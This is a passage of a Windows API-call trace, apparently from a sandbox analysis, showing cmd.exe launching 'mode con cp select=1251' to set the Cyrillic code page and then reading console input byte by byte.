lpFindFileData=0x25eff0) returned 0x385cc0 [0244.822] GetProcessHeap () returned 0x370000 [0244.822] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x28) returned 0x384660 [0244.822] FindClose (in: hFindFile=0x385cc0 | out: hFindFile=0x385cc0) returned 1 [0244.822] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x25eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25eff0) returned 0x385cc0 [0244.822] GetProcessHeap () returned 0x370000 [0244.822] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x384660, Size=0x8) returned 0x389950 [0244.822] FindClose (in: hFindFile=0x385cc0 | out: hFindFile=0x385cc0) returned 1 [0244.822] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0244.823] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0244.823] GetConsoleTitleW (in: lpConsoleTitle=0x25f540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0244.823] GetProcessHeap () returned 0x370000 [0244.823] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x21c) returned 0x38b370 [0244.823] GetConsoleTitleW (in: lpConsoleTitle=0x38b380, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0244.823] GetProcessHeap () returned 0x370000 [0244.823] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x38b370, Size=0x8a) returned 0x38b370 [0244.823] GetProcessHeap () returned 0x370000 [0244.823] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38b370) returned 0x8a [0244.823] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe - mode con cp select=1251") returned 1 [0244.823] GetProcessHeap () returned 0x370000 [0244.823] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b370 | out: hHeap=0x370000) returned 1 [0244.823] InitializeProcThreadAttributeList (in: lpAttributeList=0x25f2f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x25f2b8 | out: lpAttributeList=0x25f2f8, lpSize=0x25f2b8) returned 1 [0244.823] UpdateProcThreadAttribute (in: lpAttributeList=0x25f2f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x25f2a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x25f2f8, lpPreviousValue=0x0) returned 1 [0244.823] GetStartupInfoW (in: lpStartupInfo=0x25f410 | out: lpStartupInfo=0x25f410*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0244.823] GetProcessHeap () returned 0x370000 [0244.824] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x20) returned 0x384660 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0244.824] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0244.825] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0244.825] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0244.825] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0244.825] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0244.825] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0244.825] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0244.825] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0244.825] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0244.825] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0244.825] GetProcessHeap () returned 0x370000 [0244.825] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384660 | out: hHeap=0x370000) returned 1 [0244.825] GetProcessHeap () returned 0x370000 [0244.825] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x12) returned 0x388940 [0244.825] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\mode.com", lpCommandLine="mode con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x25f330*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="mode con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x25f2e0 | out: lpCommandLine="mode con cp select=1251", lpProcessInformation=0x25f2e0*(hProcess=0x54, hThread=0x50, dwProcessId=0x6dc, dwThreadId=0x6e0)) returned 1 [0244.897] CloseHandle (hObject=0x50) returned 1 [0244.897] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0244.897] GetProcessHeap () returned 0x370000 [0244.897] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x388aa0 | out: hHeap=0x370000) returned 1 [0244.897] GetEnvironmentStringsW () returned 0x388aa0* [0244.897] GetProcessHeap () returned 0x370000 [0244.897] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xafc) returned 0x38b370 [0244.897] FreeEnvironmentStringsW (penv=0x388aa0) returned 1 [0244.897] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x77230000 [0244.898] GetProcAddress (hModule=0x77230000, lpProcName="NtQueryInformationProcess") returned 0x772814a0 [0244.898] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x25ebe8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x25ebe8, ReturnLength=0x0) returned 0x0 [0244.898] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffdf000, lpBuffer=0x25ec20, nSize=0x380, lpNumberOfBytesRead=0x25ebe0 | out: lpBuffer=0x25ec20*, lpNumberOfBytesRead=0x25ebe0*=0x380) returned 1 [0244.898] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0246.177] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x25f228 | out: lpExitCode=0x25f228*=0x0) returned 1 [0246.177] CloseHandle (hObject=0x54) returned 1 [0246.177] _vsnwprintf (in: _Buffer=0x25f498, _BufferCount=0x13, _Format="%08X", _ArgList=0x25f238 | out: _Buffer="00000000") returned 8 [0246.177] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0246.177] GetProcessHeap () returned 0x370000 [0246.177] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b370 | out: hHeap=0x370000) returned 1 [0246.177] GetEnvironmentStringsW () returned 0x38e9b0* [0246.177] GetProcessHeap () returned 0x370000 [0246.177] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xb22) returned 0x38f4e0 [0246.177] FreeEnvironmentStringsW (penv=0x38e9b0) returned 1 [0246.177] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0246.177] GetProcessHeap () returned 0x370000 [0246.177] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38f4e0 | out: hHeap=0x370000) returned 1 [0246.177] GetEnvironmentStringsW () returned 0x38e9b0* [0246.177] GetProcessHeap () returned 0x370000 [0246.177] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xb22) returned 0x38f4e0 [0246.177] FreeEnvironmentStringsW (penv=0x38e9b0) returned 1 [0246.177] GetProcessHeap () returned 0x370000 [0246.177] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x388940 | out: hHeap=0x370000) returned 1 [0246.177] DeleteProcThreadAttributeList (in: lpAttributeList=0x25f2f8 | out: lpAttributeList=0x25f2f8) [0246.177] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1 [0246.178] _get_osfhandle (_FileHandle=1) returned 0xf4 [0246.178] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0246.178] _get_osfhandle (_FileHandle=1) returned 0xf4 [0246.178] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4abae194 | out: lpMode=0x4abae194) returned 0 [0246.178] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.178] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4abae198 | out: lpMode=0x4abae198) returned 0 [0246.178] GetConsoleOutputCP () returned 0x4e3 [0246.178] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4abbbfe0 | out: lpCPInfo=0x4abbbfe0) returned 1 [0246.179] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0246.179] GetProcessHeap () returned 0x370000 [0246.179] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x389d80 | out: hHeap=0x370000) returned 1 [0246.179] GetProcessHeap () returned 0x370000 [0246.179] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x389c60 | out: hHeap=0x370000) returned 1 [0246.179] GetProcessHeap () returned 0x370000 [0246.179] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385bb0 | out: hHeap=0x370000) returned 1 [0246.179] GetProcessHeap () returned 0x370000 [0246.179] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b310 | out: hHeap=0x370000) returned 1 [0246.179] GetProcessHeap () returned 0x370000 [0246.179] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x389900 | out: hHeap=0x370000) returned 1 [0246.179] GetProcessHeap () returned 0x370000 [0246.179] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38aae0 | out: hHeap=0x370000) returned 1 [0246.179] GetProcessHeap () returned 0x370000 [0246.179] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x386550 | out: hHeap=0x370000) returned 1 [0246.179] GetProcessHeap () returned 0x370000 [0246.179] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384630 | out: hHeap=0x370000) returned 1 [0246.179] GetProcessHeap () returned 0x370000 [0246.179] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x389840 | out: hHeap=0x370000) returned 1 [0246.179] _vsnwprintf (in: _Buffer=0x4abc6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x25f758 | out: _Buffer="\r\n") returned 2 [0246.179] _get_osfhandle (_FileHandle=1) returned 0xf4 [0246.180] GetFileType (hFile=0xf4) returned 0x3 [0246.180] _get_osfhandle (_FileHandle=1) returned 0xf4 [0246.180] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4abbc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0246.180] WriteFile (in: hFile=0xf4, lpBuffer=0x4abbc320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x25f728, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesWritten=0x25f728*=0x2, lpOverlapped=0x0) returned 1 [0246.180] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4abaf360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0246.180] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4abbc0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0246.180] _vsnwprintf (in: _Buffer=0x4abaeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x25f768 | out: _Buffer="C:\\Windows\\system32") returned 19 [0246.180] _vsnwprintf (in: _Buffer=0x4abaeb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x25f768 | out: _Buffer=">") returned 1 [0246.180] _get_osfhandle (_FileHandle=1) returned 0xf4 [0246.180] GetFileType (hFile=0xf4) returned 0x3 [0246.180] _get_osfhandle (_FileHandle=1) returned 0xf4 [0246.180] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4abbc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0246.180] WriteFile (in: hFile=0xf4, lpBuffer=0x4abbc320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x25f758, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesWritten=0x25f758*=0x14, lpOverlapped=0x0) returned 1 [0246.180] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.180] GetFileType (hFile=0xe8) returned 0x3 [0246.180] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.180] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.180] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.180] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe320, cchWideChar=1 | out: lpWideCharStr="vode con cp select=1251\n") returned 1 [0246.180] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.180] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.180] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.180] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe322, cchWideChar=1 | out: lpWideCharStr="sde con cp select=1251\n") returned 1 [0246.180] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.180] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.180] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.180] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe324, cchWideChar=1 | out: lpWideCharStr="se con cp select=1251\n") returned 1 [0246.180] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.180] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.180] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.180] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe326, cchWideChar=1 | out: lpWideCharStr="a con cp select=1251\n") returned 1 [0246.180] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.181] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.181] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.181] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe328, cchWideChar=1 | out: lpWideCharStr="dcon cp select=1251\n") returned 1 [0246.181] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.181] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.181] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.181] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe32a, cchWideChar=1 | out: lpWideCharStr="mon cp select=1251\n") returned 1 [0246.181] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.181] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.181] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.181] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe32c, cchWideChar=1 | out: lpWideCharStr="in cp select=1251\n") returned 1 [0246.181] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.181] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.181] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.181] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe32e, cchWideChar=1 | out: lpWideCharStr="n cp select=1251\n") returned 1 [0246.181] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.181] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.181] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.181] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe330, cchWideChar=1 | out: lpWideCharStr=" cp select=1251\n") returned 1 [0246.181] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.181] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.181] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.181] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe332, cchWideChar=1 | out: lpWideCharStr="dp select=1251\n") returned 1 [0246.181] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.181] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.181] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.181] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe334, cchWideChar=1 | out: lpWideCharStr="e select=1251\n") returned 1 [0246.181] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.181] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.181] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.181] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe336, cchWideChar=1 | out: lpWideCharStr="lselect=1251\n") returned 1 [0246.181] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.181] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.181] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.181] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe338, cchWideChar=1 | out: lpWideCharStr="eelect=1251\n") returned 1 [0246.181] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.181] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.181] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.181] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe33a, cchWideChar=1 | out: lpWideCharStr="tlect=1251\n") returned 1 [0246.181] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.181] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.181] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.182] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe33c, cchWideChar=1 | out: lpWideCharStr="eect=1251\n") returned 1 [0246.182] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.182] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.182] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.182] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe33e, cchWideChar=1 | out: lpWideCharStr=" ct=1251\n") returned 1 [0246.182] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.182] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.182] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, 